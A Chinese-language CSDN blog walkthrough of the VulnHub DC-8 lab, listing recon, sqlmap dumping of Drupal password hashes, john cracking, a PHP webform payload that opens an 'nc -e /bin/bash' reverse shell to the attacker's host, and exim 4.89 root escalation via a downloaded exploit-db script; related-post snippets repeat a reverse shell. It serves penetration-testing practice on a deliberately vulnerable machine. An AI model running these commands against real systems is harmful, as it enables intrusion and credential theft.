DC-8 writeup

最新推荐文章于 2024-10-18 19:00:00 发布
最新推荐文章于 2024-10-18 19:00:00 发布
阅读量398 收藏 10
点赞数 3
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64272648/article/details/141329508
版权

DC-8渗透过程(kali IP:192.168.229.132 靶机IP:192.168.229.156)

**一.信息收集**
nmap -sP 192.168.229.0/24
nmap -sV -p- 192.168.229.156
dirsearch -u 192.168.229.156 -e * -x 403,404
whatweb 192.168.229.156
得到信息:cms:drupal 7.67 语言:php 中间件:apache

**二.漏洞查找和利用**
sqlmap -u "http://192.168.229.156/?nid=3" --dbs --batch     //漏洞库查找没有可以利用的,msf试了也都不行,看这个url就感觉可能会有sql注入,加个冒号报错,则证明很可能有sql注入,丢到sqlmap里面跑还真跑出来了
sqlmap -u "http://192.168.229.156/?nid=3" --tables -D d7db --batch
sqlmap -u "http://192.168.229.156/?nid=3" --columns -T users -D d7db --batch
sqlmap -u "http://192.168.229.156/?nid=3" --dump -C name,pass -T users -D d7db --batch    //得到两个加密密码丢到john里面爆破
john test    //得到john的密码是turtle,admin的爆破不出来
<?php @exec("nc -e /bin/bash 192.168.229.132 8888")?>    //登录进去查找发现cotact us里面的webform的form setting 里面可以写PHP代码,写入反弹shell,在随便提交一个contact us触发PHP代码,连接到虚拟shell

**三.提权**
cd /home     //查看用户信息发现什么都没有
find / -perm -u=s -type f 2>/dev/null    //查看suid文件发现有exim4
exim --version    //版本4.89
searchsploit exim     //有可以利用的提权漏洞,复制下来
locate linux/local/46996.sh
cp /usr/share/exploitdb/exploits/linux/local/46996.sh test
python3 -m http.server
cd /tmp    //虚拟shell中
wget http://192.168.229.132:8000/test
chmod 777 test
./test    发现没有提权成功,用脚本里面说的另一种方式
./test -m netcat    //提权成功
find / -name * flag.*
cat /root/flag.txt

Jay-wings
关注
vulnhub靶机-DC1-Writeup
liuhanzhe的专栏
12-08 1182
vulnhub靶机-DC1-writeup
VulnHub DC-1 Writeup
末初的CSDN博客
09-28 431
DC-1详情见:https://www.vulnhub.com/entry/dc-1,292/ 靶机环境VirtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.102 攻击机环境VMware,桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177 Nmap扫描C段内存活主机 nmap -sP 192.168.56.1/24 如果觉得速度慢了的话可以使用 arp-scan -l 发现目标靶机IP:192.1
VulnHub DC-2 Writeup
末初的CSDN博客
09-28 403
DC-2详情见:https://www.vulnhub.com/entry/dc-2,311/ 靶机环境VIrtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.103 攻击机环境VMware,桥接模式,桥接至VIrtualBox Host-Only网卡,IP为:192.168.56.177 扫描C段内存活主机 arp-scan -l or nmap -sP 192.168.56.1/24 访问http://192.168.56.103发现被重定向到了
DC-5 writeup
qq_64272648的博客
08-19 439
用burpsuite爆破文件包含名/thankyou.php?file=/etc/nginx/nginx.conf //先看一下nginx的配置文件看日志文件开放没有,可能会有日志文件包含,发现有两个日志文件,这里可以看错误日志文件/var/log/nginx/error.log /thankyou.php?file=/var/log/nginx/error.log&1=nc -e /bin/bash 192.168.229.132 8888 //在kali上开启监听,连接虚拟shell。
DC-1 writeup
qq_64272648的博客
08-19 647
/得到两个用户,admin,Fred,密码加密可以尝试修改密码(新添一个用户,密码记住,然后把加密后的密码拷到admin的密码里),这里查看资料知道加密脚本是用php写的并且还能用php加参数运行,直接得到加密后的密码 cat /var/www/scripts/password-hash.sh php /var/www/scripts/password-hash.sh 123456 //得到加密后的密码 mysql -udbuser -pR0ck3t use drupaldb;
DC-2 writeup
qq_64272648的博客
08-19 442
cat /usr/share/exploitdb/exploits/multiple/webapps/47690.md //发现给了一个有漏洞的url,export PATH=$PATH:/usr/bin/ //这里用vi逃逸rbash su jerry //根据提示去jerry的家目录找找。echo /home/tom/usr/bin/* //查看上面得到的path路径的所有文件,发现可用,用less,ls,scp,vi。/bin/bash //获得root权限。
DC-7 writeup
qq_64272648的博客
08-19 140
drush upwd admin --password="123456" //修改admin的密码,登录进去看看,发现content板块可以写入html文件,但不能写入php文件,收集信息发现可以新增php模块,把这个url写到那个添加链接中https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz。ls -l //发现www-data有写入和执行权限但dcuser没有,则我们要尝试找到www-data的权限。**一.信息收集**
DC-9 writeup
qq_64272648的博客
08-19 346
file=../../../../../etc/knockd.conf //前面扫端口发现ssh协议端口不是开放状态,可能是开启了knock服务查看一下有无配置文件,还真有用nc“敲门”§ §=../../../../../etc/passwd //burp抓包,用fuzz里的参数字典爆破出为file,还发现这里的用户和开始sq爆破出来的一样,可能是主机用户的账号密码。sudo -l //发现/opt/devstuff/dist/test/test可用以root命令执行。
DC-3 writeup
qq_64272648的博客
08-19 378
登录进入后台,发现有文件上传点,上传反弹shell文件(文件见主机渗透文件夹),再用netcat 开启监听,再访问上传的shell的网站路径(配合前面的web目录扫描及网站上面的信息推断出上传的位置),得到一个虚拟shell。cat /usr/share/exploitdb/exploits/linux/local/39772.txt //查看文件,最后给出了exp下载地址。locate /linux/local/39772.txt //查看完整路径。**四.Linux提权**
DC-4 writeup
qq_64272648的博客
08-19 323
wget http://192.168.229.132:/8000/test.sh //发现没有写入权限,则cd到 /tmp 文件中,在/tmp目录下任何人都有写权限。cd /home //去家目录下寻找线索发现只有jim能查看里面的信息,mbox还看不了,里面有一个旧密码的备份文件,复制到test文件尝试爆破。find / -perm -u=s -type f 2>/dev/null //查看哪些有suid权限发现没有可用的。./test.sh //得到root权限。
vulnhub靶机-DC7-Writeup
liuhanzhe的专栏
12-09 1590
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-7,356/ DESCRIPTION DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn’t an overly technical challenge, it isn’t exactly e
vulnhub靶机-DC6-Writeup
liuhanzhe的专栏
12-08 358
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-6,315/ DESCRIPTION DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for be
vulnhub靶机-DC8-Writeup
liuhanzhe的专栏
12-09 2015
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-8,367/ DESCRIPTION DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challe
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 646
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
qq_44969472的博客
10-15 386
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1215
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-12 1205
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全(黑客技术)三个月自学手册
最新发布
csbDD的博客
10-18 507
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值